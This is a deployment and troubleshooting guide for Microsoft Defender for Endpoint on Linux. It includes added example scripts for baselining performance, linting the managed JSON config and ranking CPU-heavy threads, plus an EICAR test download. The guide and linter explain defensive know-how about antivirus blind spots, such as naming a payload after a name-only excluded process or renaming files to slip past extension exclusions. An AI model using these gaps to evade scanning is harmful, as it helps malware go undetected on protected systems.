Work with your Firewall, Proxy, and Networking admin to add the Microsoft Defender
for Endpoint URLs to the allowed list, and prevent it from being SSL inspected.

For more information, see Troubleshoot cloud connectivity issues.

Network connectivity of Microsoft Defender for Endpoint


Use the following steps to check the network connectivity of Microsoft Defender for
Endpoint:

1. See Allow URLs for the Microsoft Defender for Endpoint traffic for the URLs that
must be reachable for the Microsoft Defender for Endpoint traffic.

2. If the Linux servers are behind a proxy, then set the proxy settings. For more
information, see Set up proxy settings.

3. Verify that the traffic isn't being inspected by SSL inspection (TLS inspection). This
is the most common network-related issue when setting up Microsoft Defender for
Endpoint. See Verify SSL inspection isn't being performed on the network traffic.

Step 1: Allow URLs for the Microsoft Defender for Endpoint traffic

1. Download the Microsoft Defender for Endpoint URL list for commercial
customers or the Microsoft Defender for Endpoint URL list for Gov/GCC/DoD
for a list of services and their associated URLs that your network must be able to
connect.

2. Under Geography column, ensure the following checkboxes are selected:

EU, or UK, or US
WW
(Blanks)

Note

You should ensure that there are no firewall or network filtering rules that
would deny access to these URLs. If there are, you may need to create an
allow rule specifically for them.

3. Work with the Firewall/Proxy/Networking admins to allow the relevant URLs.

Step 2: Set up proxy settings


If the Linux servers are behind a proxy, use the following settings guidance.

The following table lists the supported proxy settings:

Supported                          | Not supported
Transparent proxy                  | Proxy autoconfig (PAC, a type of authenticated proxy)
Manual static proxy configuration  | Web proxy autodiscovery protocol (WPAD, a type of authenticated proxy)

Network connections
Full configuration profile
Static proxy configuration
Troubleshooting connectivity issues in static proxy scenario

Step 3: Verify SSL inspection isn't being performed on the network traffic

To prevent man-in-the-middle attacks, all Microsoft Azure hosted traffic uses certificate
pinning. As a result, SSL inspections by major firewall systems aren't allowed. You have
to bypass SSL inspection for Microsoft Defender for Endpoint URLs.

Troubleshoot cloud connectivity issues

For more information, see Troubleshooting cloud connectivity issues for Microsoft
Defender for Endpoint on Linux.

2. Capture performance data from the endpoint

Capture performance data from the endpoints that have Defender for Endpoint
installed. This includes disk space availability on all mounted partitions, memory usage,
process list, and CPU usage (aggregate across all cores).
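A baseline-capture script for this step, added here as an example rather than a Microsoft tool or code from this page: it samples aggregate CPU busy time across all cores from two reads of /proc/stat, memory use from /proc/meminfo, the load average, free space on every mounted filesystem, and the busiest processes, and writes them to a file you can diff against a second capture taken after deployment (step 14 in the summary). Function names, the 5-second default sample interval, and the wdavdaemon process-name filter (the Defender for Endpoint daemon) are assumptions, not from the page; the constructed /proc/stat and /proc/meminfo lines in the usage are sample values.

```shell
#!/bin/sh
# Performance baseline for a Linux endpoint, captured before and after deploying
# Defender for Endpoint. Added example for this page, not a Microsoft tool.
# Assumes a Linux host with /proc mounted. Run once before deployment and once
# after, then diff the two files.

# cpu_busy_percent LINE_BEFORE LINE_AFTER
#   Aggregate CPU busy percentage across all cores from the first ("cpu ...")
#   line of /proc/stat sampled twice. Fields after "cpu" are user nice system
#   idle iowait irq softirq steal; idle and iowait are counted as idle time.
cpu_busy_percent() {
    printf '%s\n%s\n' "$1" "$2" | awk '
        NR == 1 { for (i = 2; i <= 9; i++) before[i] = $i }
        NR == 2 {
            total = 0; idle = 0
            for (i = 2; i <= 9; i++) {
                d = $i - before[i]
                total += d
                if (i == 5 || i == 6) idle += d
            }
            if (total <= 0) print 0
            else printf "%d\n", (100 * (total - idle)) / total
        }'
}

# mem_used_percent MEMINFO_TEXT
#   Percentage of RAM in use, from the MemTotal and MemAvailable lines of /proc/meminfo.
mem_used_percent() {
    printf '%s\n' "$1" | awk '
        /^MemTotal:/     { total = $2 }
        /^MemAvailable:/ { avail = $2 }
        END {
            if (total == 0) print 0
            else printf "%d\n", (100 * (total - avail)) / total
        }'
}

# capture_baseline OUTFILE
#   Writes one snapshot: CPU busy % over SAMPLE_SECONDS (default 5), memory use,
#   load average, free space on every mounted filesystem, and the busiest processes.
capture_baseline() {
    outfile="$1"
    before=$(head -n 1 /proc/stat)
    sleep "${SAMPLE_SECONDS:-5}"
    after=$(head -n 1 /proc/stat)
    {
        echo "== captured $(date -u +%Y-%m-%dT%H:%M:%SZ) on $(hostname 2>/dev/null || echo unknown-host)"
        echo "== cpu_busy_percent: $(cpu_busy_percent "$before" "$after")"
        echo "== mem_used_percent: $(mem_used_percent "$(cat /proc/meminfo)")"
        echo "== loadavg: $(cat /proc/loadavg)"
        echo "== disk space (all mounted filesystems)"
        df -P
        echo "== top processes by cpu"
        ps -eo pid,pcpu,pmem,rss,comm --sort=-pcpu 2>/dev/null | head -n 20
        echo "== Defender processes (wdavdaemon); present only after deployment"
        ps -eo pid,pcpu,pmem,rss,comm 2>/dev/null | grep wdavdaemon || echo "(none)"
    } > "$outfile"
}

# Usage on a host:
#   capture_baseline /var/tmp/mde-before.txt   (before deployment)
#   capture_baseline /var/tmp/mde-after.txt    (after deployment, same load)
#   diff /var/tmp/mde-before.txt /var/tmp/mde-after.txt
```

Take both captures under comparable load (same time of day, same workloads running); a single 5-second CPU sample is noisy, so raise SAMPLE_SECONDS or repeat the capture a few times when the numbers matter.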

3. (Optional) Check for filesystem errors with 'fsck' (akin to chkdsk)

Any filesystem could end up getting corrupted, so before installing any new software, it
is good practice to install it on a healthy file system.

4. (Optional) Update storage subsystem drivers

Newer driver or firmware on a storage subsystem could help with performance and/or
reliability.

5. (Optional) Update NIC drivers

Newer drivers or firmware for NICs, or newer NIC teaming software, could help with
performance and/or reliability.

6. Confirm system requirements and resource recommendations are met

The following section provides information on supported Linux versions and recommendations for resources.

For a detailed list of supported Linux distros, see System requirements.

Resource | Recommendation
Disk space | Minimum: 2 GB. NOTE: More disk space might be needed if cloud diagnostics are enabled for crash collections.
RAM | 1 GB; 4 GB is preferred
CPU | If the Linux system is running only one vCPU, we recommend increasing it to two vCPUs; 4 cores are preferred

OS version | Kernel filter driver | Comments
RHEL 7.x, RHEL 8.x, and RHEL 9.x | No kernel filter driver; the fanotify kernel option must be enabled | fanotify is akin to Filter Manager (fltmgr, accessible via fltmc.exe) in Windows
RHEL 6.x | TALPA kernel driver |

7. Add your existing solution to the exclusion list for Microsoft Defender Antivirus

This step of the setup process involves adding Defender for Endpoint to the exclusion list for your existing endpoint protection solution and any other security products your organization is using. You can choose from several methods to add your exclusions to Microsoft Defender Antivirus.

 Tip

To get help configuring exclusions, refer to your solution provider's documentation.

Your ability to run Microsoft Defender for Endpoint on Linux alongside a non-Microsoft antimalware product depends on the implementation details of that product. If the other antimalware product uses fanotify, it has to be uninstalled to eliminate performance and stability side effects resulting from running two conflicting agents.

To check whether a non-Microsoft antimalware product that uses fanotify is running, run mdatp health and check the result: under "conflicting_applications", if you see a result other than "unavailable", uninstall the non-Microsoft antimalware.

If you don't uninstall the non-Microsoft antimalware product, you might encounter unexpected behaviors such as performance issues, stability issues such as systems hanging, or kernel panics.

To identify the Microsoft Defender for Endpoint on Linux processes and paths that should be excluded in the non-Microsoft antimalware product, run systemctl status -l mdatp .

Exclude the following processes from the non-Microsoft antimalware product:

wdavdaemon
crashpad_handler
mdatp_audisp_plugin
telemetryd_v2

Exclude the following paths from the non-Microsoft antimalware product:

/opt/microsoft/mdatp/
/var/opt/microsoft/mdatp/
/etc/opt/microsoft/mdatp/
8. Keep the following points about exclusions in mind

When you add exclusions to Microsoft Defender Antivirus scans, you should add path and process exclusions.

Note

Antivirus exclusions apply to the antivirus engine.

Indicators allow/block apply to the antivirus engine.

Keep the following points in mind:

Path exclusions exclude specific files and whatever those files access.
Process exclusions exclude whatever a process touches, but don't exclude the process itself.
List your process exclusions using their full path and not by their name only. The name-only method is less secure: any binary with that name, in any directory, inherits the exclusion, so an attacker only has to name a payload after an excluded process.
If you list each executable as both a path exclusion and a process exclusion, the process and whatever it touches are excluded.

 Tip

Review "Common mistakes to avoid when defining exclusions", specifically the Folder locations and Processes sections for the Linux and macOS platforms.

9. Create device groups

Set up your device groups, device collections, and organizational units. Device groups, device collections, and organizational units enable your security team to manage and assign security policies efficiently and effectively. The following describes each of these collection types and how to configure them. Your organization might not use all three collection types.

Device groups (formerly called machine groups) enable your security operations team to configure security capabilities, such as automated investigation and remediation. Device groups are also useful for assigning access to those devices so that your security operations team can take remediation actions if needed. Device groups are created so that when an attack is detected and stopped, alerts such as an "initial access alert" are triggered and appear in the Microsoft Defender portal. To create a device group:

1. Go to the Microsoft Defender portal (https://security.microsoft.com).
2. In the navigation pane on the left, choose Settings > Endpoints > Permissions > Device groups.
3. Choose + Add device group.
4. Specify a name and description for the device group.
5. In the Automation level list, select an option. (We recommend Full - remediate threats automatically.) To learn more about the various automation levels, see How threats are remediated.
6. Specify conditions for a matching rule to determine which devices belong to the device group. For example, you can choose a domain, OS versions, or even use device tags.
7. On the User access tab, specify roles that should have access to the devices that are included in the device group.
8. Choose Done.

Device collections enable your security operations team to manage applications, deploy compliance settings, or install software updates on the devices in your organization. Device collections are created by using Configuration Manager. Follow the steps in Create a collection.

Organizational units enable you to logically group objects such as user accounts, service accounts, or computer accounts. You can then assign administrators to specific organizational units, and apply group policy to enforce targeted configuration settings. Organizational units are defined in Microsoft Entra Domain Services. Follow the steps in Create an Organizational Unit in a Microsoft Entra Domain Services managed domain.
10. Configure Microsoft Defender for Endpoint on Linux antimalware settings

Before you begin:

If you're already using a non-Microsoft antimalware product for your Linux servers, consider that you might have to copy the existing exclusions to Microsoft Defender for Endpoint on Linux.

If you're not using a non-Microsoft antimalware product for your Linux servers, get a list of all your Linux applications and check the vendor's website for exclusions.

If you're running a non-Microsoft antimalware product, add its processes/paths to the Microsoft Defender for Endpoint antivirus exclusion list. For more information, check the non-Microsoft antimalware documentation or contact their support.

If you're testing on one machine, you can use the command line to set up the exclusions:
Configure from the command line.
Configure and validate exclusions for Microsoft Defender for Endpoint on Linux.

If you're testing on multiple machines, then use the following mdatp_managed.json file. If you're coming from Windows, this is like a 'group policy' for Defender for Endpoint on Linux.

You can consider modifying the file based on your needs. The first example below illustrates the syntax; entries such as the /home directory and the cat process name are placeholders that would be scanning blind spots in production, so replace them with the narrowest exclusions your workloads need:

JSON

{
  "antivirusEngine": {
    "enforcementLevel": "real_time",
    "scanAfterDefinitionUpdate": true,
    "scanArchives": true,
    "maximumOnDemandScanThreads": 1,
    "exclusionsMergePolicy": "merge",
    "exclusions": [
      {
        "$type": "excludedPath",
        "isDirectory": false,
        "path": "/var/log/system.log"
      },
      {
        "$type": "excludedPath",
        "isDirectory": true,
        "path": "/home"
      },
      {
        "$type": "excludedFileExtension",
        "extension": "pdf"
      },
      {
        "$type": "excludedFileName",
        "name": "cat"
      }
    ],
    "allowedThreats": [
      "<EXAMPLE DO NOT USE>EICAR-Test-File (not a virus)"
    ],
    "disallowedThreatActions": [
      "allow",
      "restore"
    ],
    "threatTypeSettingsMergePolicy": "merge",
    "threatTypeSettings": [
      {
        "key": "potentially_unwanted_application",
        "value": "block"
      },
      {
        "key": "archive_bomb",
        "value": "audit"
      }
    ]
  },
  "cloudService": {
    "enabled": true,
    "diagnosticLevel": "optional",
    "automaticSampleSubmissionConsent": "safe",
    "automaticDefinitionUpdateEnabled": true,
    "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
  }
}

Recommendations (the merge policies are locked to admin_only, as described in the table that follows; the empty-string entries are placeholders to fill in or remove):

JSON

{
  "antivirusEngine": {
    "enforcementLevel": "real_time",
    "scanAfterDefinitionUpdate": true,
    "scanArchives": true,
    "maximumOnDemandScanThreads": 1,
    "exclusionsMergePolicy": "admin_only",
    "exclusions": [
      {
        "$type": "excludedPath",
        "isDirectory": false,
        "path": "/var/log/system.log"
      },
      {
        "$type": "excludedPath",
        "isDirectory": true,
        "path": "/proc"
      },
      {
        "$type": "excludedPath",
        "isDirectory": true,
        "path": "/sys"
      },
      {
        "$type": "excludedPath",
        "isDirectory": true,
        "path": "/dev"
      },
      {
        "$type": "excludedFileExtension",
        "extension": ""
      },
      {
        "$type": "excludedFileName",
        "name": ""
      }
    ],
    "allowedThreats": [
      ""
    ],
    "disallowedThreatActions": [
      "allow",
      "restore"
    ],
    "threatTypeSettingsMergePolicy": "admin_only",
    "threatTypeSettings": [
      {
        "key": "potentially_unwanted_application",
        "value": "block"
      },
      {
        "key": "archive_bomb",
        "value": "audit"
      }
    ]
  },
  "cloudService": {
    "enabled": true,
    "diagnosticLevel": "optional",
    "automaticSampleSubmissionConsent": "safe",
    "automaticDefinitionUpdateEnabled": true,
    "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"
  }
}
Note

On Linux (and macOS), paths that start with a wildcard are supported.

The following table describes the settings that are recommended as part of the mdatp_managed.json file:

Setting | Comment
exclusionsMergePolicy set to admin_only | Prevents the local admin from adding local exclusions (via bash, the command prompt).
disallowedThreatActions set to allow and restore | Prevents the local admin from restoring a quarantined item (via bash, the command prompt).
threatTypeSettingsMergePolicy set to admin_only | Prevents the local admin from adding false positives, or true positives that are benign, to the threat types (via bash, the command prompt).

Save the setting as the mdatp_managed.json file.
Copy the setting to this path: /etc/opt/microsoft/mdatp/managed/ . For more information, see Set preferences for Microsoft Defender for Endpoint on Linux.
Add your non-Microsoft antimalware processes and paths to the exclusion list from the prior step.
Verify that you've added your current exclusions from your non-Microsoft antimalware solution to the prior step.

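A linter for mdatp_managed.json, added here as an example rather than taken from the Microsoft documentation. It checks the lockdown settings from the table above (admin_only merge policies, allow and restore disallowed) and flags exclusions that create scanning blind spots: directory exclusions over whole writable trees, name-only process exclusions, extension exclusions (a payload only has to be renamed, and Linux ignores extensions on execution), and placeholder values left in allowedThreats or the proxy setting. The severity labels and the BROAD_DIRECTORIES list are this example's own, and the two sample configurations are constructed.

```python
"""Lint an mdatp_managed.json before it is rolled out with Ansible, Puppet or Chef.

Added example, not Microsoft tooling. It checks the lockdown settings from the
recommendations table (admin_only merge policies, allow/restore disallowed) and
flags exclusions that create scanning blind spots. BROAD_DIRECTORIES, the severity
labels and both sample configurations are this example's own.
"""
import json
import posixpath

# Directory exclusions over these trees hide most of what an attacker can write to.
BROAD_DIRECTORIES = {"/", "/home", "/tmp", "/var", "/var/tmp", "/opt", "/usr", "/etc", "/root"}
REQUIRED_DISALLOWED_ACTIONS = {"allow", "restore"}


def lint_managed_config(text: str) -> list:
    """Return (severity, message) findings for the managed-config JSON in `text`.

    A syntax error such as a missing comma raises json.JSONDecodeError; a file that
    does not parse yields no policy at all, so that must stay fatal here.
    """
    cfg = json.loads(text)
    findings = []
    av = cfg.get("antivirusEngine", {})

    for key in ("exclusionsMergePolicy", "threatTypeSettingsMergePolicy"):
        if av.get(key) != "admin_only":
            findings.append(("high", f"{key} is {av.get(key)!r}; set admin_only so a local "
                                     "root user cannot widen exclusions or relax threat actions"))

    missing = REQUIRED_DISALLOWED_ACTIONS - set(av.get("disallowedThreatActions", []))
    if missing:
        findings.append(("high", f"disallowedThreatActions lacks {sorted(missing)}; a local "
                                 "admin could allow a threat or restore it from quarantine"))

    if av.get("enforcementLevel") != "real_time":
        findings.append(("medium", f"enforcementLevel is {av.get('enforcementLevel')!r}; "
                                   "real-time protection is off unless passive mode is intended"))

    for threat in av.get("allowedThreats", []):
        if threat.strip():
            findings.append(("high", f"allowedThreats permits {threat!r}; remove placeholders "
                                     "and review any real entry"))

    for exc in av.get("exclusions", []):
        kind = exc.get("$type")
        if kind == "excludedPath":
            path = exc.get("path", "")
            if not (path.startswith("/") or path.startswith("*")):
                findings.append(("medium", f"excludedPath {path!r} is neither absolute nor a "
                                           "leading-wildcard pattern"))
            elif exc.get("isDirectory") and posixpath.normpath(path) in BROAD_DIRECTORIES:
                findings.append(("high", f"directory exclusion {path!r} blinds the scanner to "
                                         "an entire writable tree"))
        elif kind == "excludedFileName":
            name = exc.get("name", "")
            if name and "/" not in name:
                findings.append(("medium", f"process exclusion {name!r} is name-only; any "
                                           f"binary called {name!r} anywhere is exempt, prefer "
                                           "the full path"))
        elif kind == "excludedFileExtension":
            ext = exc.get("extension", "")
            if ext:
                findings.append(("medium", f"extension exclusion {ext!r} is bypassed by "
                                           "renaming a payload; Linux ignores extensions on exec"))
            else:
                findings.append(("low", "empty excludedFileExtension placeholder; remove it"))

    cloud = cfg.get("cloudService", {})
    if not cloud.get("enabled", False):
        findings.append(("high", "cloudService.enabled is false; cloud-delivered protection "
                                 "and sample submission are off"))
    if "EXAMPLE" in cloud.get("proxy", ""):
        findings.append(("low", "cloudService.proxy still holds the documentation placeholder"))
    return findings


# Constructed sample: the permissive shape of the first JSON example above.
SAMPLE_WEAK = """
{
  "antivirusEngine": {
    "enforcementLevel": "real_time",
    "exclusionsMergePolicy": "merge",
    "exclusions": [
      {"$type": "excludedPath", "isDirectory": true, "path": "/home"},
      {"$type": "excludedFileName", "name": "cat"},
      {"$type": "excludedFileExtension", "extension": "pdf"}
    ],
    "allowedThreats": ["<EXAMPLE DO NOT USE>EICAR-Test-File (not a virus)"],
    "disallowedThreatActions": ["allow"],
    "threatTypeSettingsMergePolicy": "merge"
  },
  "cloudService": {"enabled": true, "proxy": "<EXAMPLE DO NOT USE> http://proxy.server:port/"}
}
"""

# Constructed sample: locked down, with narrow exclusions only.
SAMPLE_HARDENED = """
{
  "antivirusEngine": {
    "enforcementLevel": "real_time",
    "exclusionsMergePolicy": "admin_only",
    "exclusions": [
      {"$type": "excludedPath", "isDirectory": true, "path": "/proc"},
      {"$type": "excludedPath", "isDirectory": true, "path": "/sys"},
      {"$type": "excludedPath", "isDirectory": true, "path": "/dev"},
      {"$type": "excludedPath", "isDirectory": true, "path": "/var/lib/pacemaker"}
    ],
    "allowedThreats": [],
    "disallowedThreatActions": ["allow", "restore"],
    "threatTypeSettingsMergePolicy": "admin_only"
  },
  "cloudService": {"enabled": true, "proxy": "http://proxy.corp.example:8080/"}
}
"""

if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(f"== {label}: {len(lint_managed_config(sample))} finding(s)")
        for severity, message in lint_managed_config(sample):
            print(f"  [{severity}] {message}")
```

Point it at the real file with `lint_managed_config(open("/etc/opt/microsoft/mdatp/managed/mdatp_managed.json").read())` in your deployment pipeline and fail the rollout on any high finding.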
Applications that Microsoft Defender for Endpoint can impact

High I/O workloads such as Postgres, OracleDB, Jira, and Jenkins might require other exclusions, depending on the amount of activity that is being processed (and monitored by Defender for Endpoint). It's best to follow guidance from non-Microsoft application providers for their exclusions if you experience performance degradation after installing Defender for Endpoint. Also keep in mind Common Exclusion Mistakes for Microsoft Defender Antivirus.

If you experience performance degradation, see the following resources:

Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux.
Troubleshoot AuditD performance issues with Microsoft Defender for Endpoint on Linux.

11. Download the Microsoft Defender for Endpoint on Linux onboarding package

For more information, see Download the onboarding package from the Microsoft Defender portal.

Note

This download registers Microsoft Defender for Endpoint on Linux to send data to your Microsoft Defender for Endpoint instance.

After downloading this package, you can follow the manual installation instructions or use a Linux management platform to deploy and manage Defender for Endpoint on Linux.

12. Ansible, Puppet, and Chef examples to manage Microsoft Defender for Endpoint on Linux

Defender for Endpoint on Linux is designed to allow almost any management solution to easily deploy and manage Defender for Endpoint settings on Linux. A few common Linux management platforms are Ansible, Puppet, and Chef. The following documents contain examples of how to configure these management platforms to deploy and configure Defender for Endpoint on Linux.

Deploy Microsoft Defender for Endpoint on Linux with Puppet
Deploy Microsoft Defender for Endpoint on Linux with Ansible
Deploy Microsoft Defender for Endpoint on Linux with Chef

Note

Reboots are NOT required after installing or updating Microsoft Defender for Endpoint on Linux except when you're running auditd in immutable mode.

Deliver the scheduled scans cronjob setting

Schedule an antivirus scan using Anacron in Microsoft Defender for Endpoint on Linux. For more information, see Schedule an antivirus scan using Anacron in Microsoft Defender for Endpoint on Linux.

Update Microsoft Defender for Endpoint on Linux agent cronjob settings

Schedule an update of Microsoft Defender for Endpoint on Linux. For more information, see Schedule an update of the Microsoft Defender for Endpoint on Linux.

13. Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux

Learn how to troubleshoot issues that might occur during installation in Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux.

14. Check resource utilization statistics

Check performance statistics and compare post-deployment utilization with the predeployment baseline captured in step 2.

15. Verify communication with Microsoft Defender for Endpoint backend

To verify the Microsoft Defender for Endpoint on Linux communication to the cloud with the current network settings, run the following connectivity test from the command line:

Bash

mdatp connectivity test

The test prints each Defender for Endpoint cloud URL it tries and the result; every line should report OK. A URL that fails here points back to the firewall, proxy or SSL-inspection checks in step 1. For more information, see Connectivity validation.

16. Investigate agent health issues

Investigate agent health issues based on the values returned when you run the mdatp health command. For more information, see Investigate agent health issues.

17. Verify that you're able to get platform updates (agent updates)

To verify Microsoft Defender for Endpoint on Linux platform updates, run the following command line:

Bash

sudo yum update mdatp

or

Bash

sudo apt-get update && sudo apt-get install --only-upgrade mdatp

depending on your package manager. (apt-get update only refreshes the package index and takes no package name; the install step is what upgrades the mdatp package.)

For more information, see Device health and Microsoft Defender antimalware health report.

To find the latest Broad channel release, visit What's new in Microsoft Defender for Endpoint on Linux.

How to update Microsoft Defender for Endpoint on Linux

Microsoft regularly publishes software updates to improve performance and security, and to deliver new features. For information on how to update Microsoft Defender for Endpoint on Linux, see Deploy updates for Microsoft Defender for Endpoint on Linux.

Note

If you have Red Hat Satellite (akin to WSUS in Windows), you can get the updated packages from it.

 Tip

Automate the agent update on a monthly (recommended) schedule by using a cron job. For more information, see Schedule an update of the Microsoft Defender for Endpoint on Linux.

Non-Windows endpoints

With macOS and Linux, you could take a couple of systems and run them in the Beta channel.

Note

Ideally you should include one of each type of Linux system you are running in the Preview channel so that you are able to find compatibility, performance and reliability issues before the build makes it into the Current channel.

The choice of the channel determines the type and frequency of updates that are offered to your device. Devices in Beta are the first ones to receive updates and new features, followed later by Preview and lastly by Current. In order to preview new features and provide early feedback, it's recommended that you configure some devices in your enterprise to use either Beta or Preview.

Warning

Switching the channel after the initial installation requires the product to be reinstalled. To switch the product channel: uninstall the existing package, re-configure your device to use the new channel, and follow the steps in this document to install the package from the new location.

18. Verify that you're able to get security intelligence updates (signatures/definition updates)

To verify Microsoft Defender for Endpoint on Linux signatures/definition updates, run the following command line:

Bash

mdatp definitions update

For more information, see New device health reporting for Microsoft Defender antimalware.

19. Test detections

To ensure that the device is correctly onboarded and reported to the service, run the following detection test:

Antimalware detections:

Bash

curl -o /tmp/eicar.com.txt https://www.eicar.org/download/eicar.com.txt

The EICAR file is the industry-standard harmless test string; every antimalware engine detects it. If the detection doesn't show up, it could be that you have set "allowedThreats" to allow it in preferences via Ansible or Puppet, or that the download path falls under one of your exclusions.

Endpoint detection and response (EDR) detections: For more information, see
Experience Microsoft Defender for Endpoint through simulated attacks. If the
detection doesn't show up, then it could be that we're missing event or alerts in
portal. For more information, see Troubleshoot missing events or alerts issues for
Microsoft Defender for Endpoint on Linux.

For more information about unified submissions in Microsoft Defender XDR and
the ability to submit False Positives and False Negatives through the portal, see
Unified submissions in Microsoft Defender XDR now Generally Available! -
Microsoft Tech Community .

20. Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux

For more information, see Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux.

21. Troubleshoot high CPU utilization by ISVs, Linux apps, or scripts

If you observe that third-party ISVs, internally developed Linux apps, or scripts run into high CPU utilization, take the following steps to investigate the cause.

1. Identify the thread or process that's causing the symptom.


2. Apply further diagnostic steps based on the identified process to address the issue.

Step 1: Identify the Microsoft Defender for Endpoint on Linux thread causing the symptom

Use the following syntaxes to help identify the process that is causing CPU overhead:

To get the Microsoft Defender for Endpoint process ID causing the issue, run:

Bash

sudo top -c

To get more details on the Microsoft Defender for Endpoint process, run:

Bash

sudo ps ax --no-headings -T -o user,pid,thcount,%cpu,sched,%mem,vsz,rss,tname,stat,start_time,time,ucmd,command | sort -nrk 3 | grep mdatp

To identify the specific Microsoft Defender for Endpoint thread ID causing the highest CPU utilization within the process, run:

Bash

sudo ps -T -p <PID> >> Thread_with_highest_cpu_usage.log

The following table lists the processes that might cause high CPU usage:

Process name | Component used | MDE engine used
wdavdaemon | FANotify | Antivirus & EDR
wdavdaemon unprivileged | | Antivirus engine
wdavdaemon edr | | EDR engine
mdatp_audisp_plugin | audit framework (auditd) | Audit log ingestion

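An added example (not from the Microsoft page) that parses the ps -T output from the step above and names the engine behind the thread burning the most CPU, using the process-to-engine mapping in the table. The ps column list, the parser and the role table are this example's own, and PS_SAMPLE is constructed rather than captured from a host.

```python
"""Rank the threads of a Defender for Endpoint process by CPU and name the engine.

Added example; the ps invocation follows the `ps -T -p <PID>` step above, while the
column list, the parser and the role table are this example's own. PS_SAMPLE is
constructed output, not a capture from a real host.
"""
import posixpath
import subprocess

# Engine behind each mdatp process, keyed by how its command line starts
# (longer prefixes first so "wdavdaemon unprivileged" is not matched by "wdavdaemon").
ROLES = [
    ("wdavdaemon unprivileged", "antivirus engine"),
    ("wdavdaemon edr", "EDR engine"),
    ("wdavdaemon", "fanotify (antivirus + EDR)"),
    ("mdatp_audisp_plugin", "auditd log ingestion"),
]

PS_COLUMNS = "pid,spid,pcpu,args"   # args last, because it may contain spaces


def role_for(args: str) -> str:
    """Map a full command line to the engine it belongs to."""
    tokens = args.split()
    if not tokens:
        return "not an mdatp process"
    name = " ".join([posixpath.basename(tokens[0])] + tokens[1:])
    for prefix, role in ROLES:
        if name.startswith(prefix):
            return role
    return "not an mdatp process"


def parse_threads(ps_output: str) -> list:
    """Parse `ps -T -p PID -o pid,spid,pcpu,args` output; highest %CPU first."""
    rows = []
    for line in ps_output.strip().splitlines()[1:]:   # skip the header line
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, spid, pcpu, args = parts
        rows.append({
            "pid": int(pid),
            "tid": int(spid),        # kernel thread id (SPID), what `top -H` shows
            "cpu": float(pcpu),
            "args": args,
            "role": role_for(args),
        })
    return sorted(rows, key=lambda r: r["cpu"], reverse=True)


def top_thread(pid: int):
    """Live query (Linux, procps): the hottest thread of `pid`, or None if it has none."""
    out = subprocess.run(
        ["ps", "-T", "-p", str(pid), "-o", PS_COLUMNS],
        capture_output=True, text=True, check=True,
    ).stdout
    threads = parse_threads(out)
    return threads[0] if threads else None


# Constructed sample in the shape of `ps -T -p 1234 -o pid,spid,pcpu,args`.
PS_SAMPLE = """\
    PID    SPID %CPU COMMAND
   1234    1234  0.3 /opt/microsoft/mdatp/sbin/wdavdaemon unprivileged
   1234    1240 42.7 /opt/microsoft/mdatp/sbin/wdavdaemon unprivileged
   1234    1241  1.1 /opt/microsoft/mdatp/sbin/wdavdaemon unprivileged
"""

if __name__ == "__main__":
    hot = parse_threads(PS_SAMPLE)[0]
    print(f"thread {hot['tid']} of pid {hot['pid']} at {hot['cpu']}% CPU: {hot['role']}")
```

The role tells you which row of the table in Step 2 applies: an antivirus-engine thread points at exclusions and file submissions, an EDR-engine thread at the EDR guidance, and an auditd plugin thread at the AuditD performance article.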
Step 2: Apply further diagnostic steps based on the identified process

Now that you've identified the process that is causing the high CPU usage, use the corresponding diagnostic guidance in the following section.

For example, in the previous step, wdavdaemon unprivileged was identified as the process that was causing high CPU usage. Based on the result, you can apply the guidance to check the wdavdaemon unprivileged process.

Use the following guidance to troubleshoot high CPU utilization:

wdavdaemon (component: FANotify; engine: Antivirus & EDR)
- Download and run Microsoft Defender for Endpoint Client Analyzer. For more information, see Run the client analyzer on macOS or Linux.
- Collect diagnostic data using the Client analyzer tool.
- Open a CSS support case with Microsoft. For more information, see CSS security support case.

wdavdaemon unprivileged (engine: Antivirus)
Diagram (not reproduced here): the workflow and steps required in order to add antivirus exclusions.
General troubleshooting guidance:
- If you have in-house apps/scripts or a legitimate third-party app/script getting flagged, Microsoft security researchers analyze suspicious files to determine if they're threats, unwanted applications, or normal files. Submit files you think are malware or files that you believe have been incorrectly classified as malware by using the unified submissions experience (for more information, see Unified submissions experience) or File submissions.
- See Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux.
- Download and run Microsoft Defender for Endpoint Client Analyzer. For more information, see Run the client analyzer on macOS or Linux.
- Collect diagnostic data using the Client analyzer tool.
- Open a CSS support case with Microsoft. For more information, see CSS security support case.

wdavdaemon edr (engine: EDR)
Diagram (not reproduced here): the workflow and steps to troubleshoot wdavdaemon edr process issues.
General troubleshooting guidance: the same steps as for wdavdaemon unprivileged above (file submission for misclassified in-house or third-party apps, the performance troubleshooting article, the Client Analyzer, diagnostic data collection, and a CSS support case).

mdatp_audisp_plugin (component: audit framework; engine: audit log ingestion)
- See Troubleshoot AuditD performance issues with Microsoft Defender for Endpoint on Linux.

22. Uninstall your non-Microsoft solution

If at this point you have:

Onboarded your organization's devices to Defender for Endpoint, and
Microsoft Defender Antivirus is installed and enabled,

then your next step is to uninstall your non-Microsoft antivirus, antimalware, and endpoint protection solution. When you uninstall your non-Microsoft solution, make sure to update your configuration to switch from Passive Mode to Active if you set Defender for Endpoint to Passive mode during the installation or configuration; otherwise the host is left with no real-time scanner at all.

Diagnostic and troubleshooting resources

Troubleshoot Microsoft Defender for Endpoint on Linux installation issues.
Identify where to find detailed logs for installation issues.
Troubleshooting steps for environments without proxy or with transparent proxy.
Troubleshooting steps for environments with static proxy.
Collect diagnostic information.
Uninstall Defender for Endpoint on Linux.
Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux.
Troubleshoot AuditD performance issues with Microsoft Defender for Endpoint on Linux.

Advanced Microsoft Defender for Endpoint capabilities
Enhanced antimalware engine capabilities on Linux and macOS

Boost protection of Linux estate with behavior monitoring

Note

The behavior monitoring functionality complements the existing strong content-based capabilities; however, you should carefully evaluate this feature in your environment before deploying it broadly, since enabling behavioral monitoring consumes more resources and may cause performance issues.

Unified submissions in Microsoft Defender XDR

Introducing the new alert suppression experience

Announcing live response for macOS and Linux

References
Add a tag or group ID

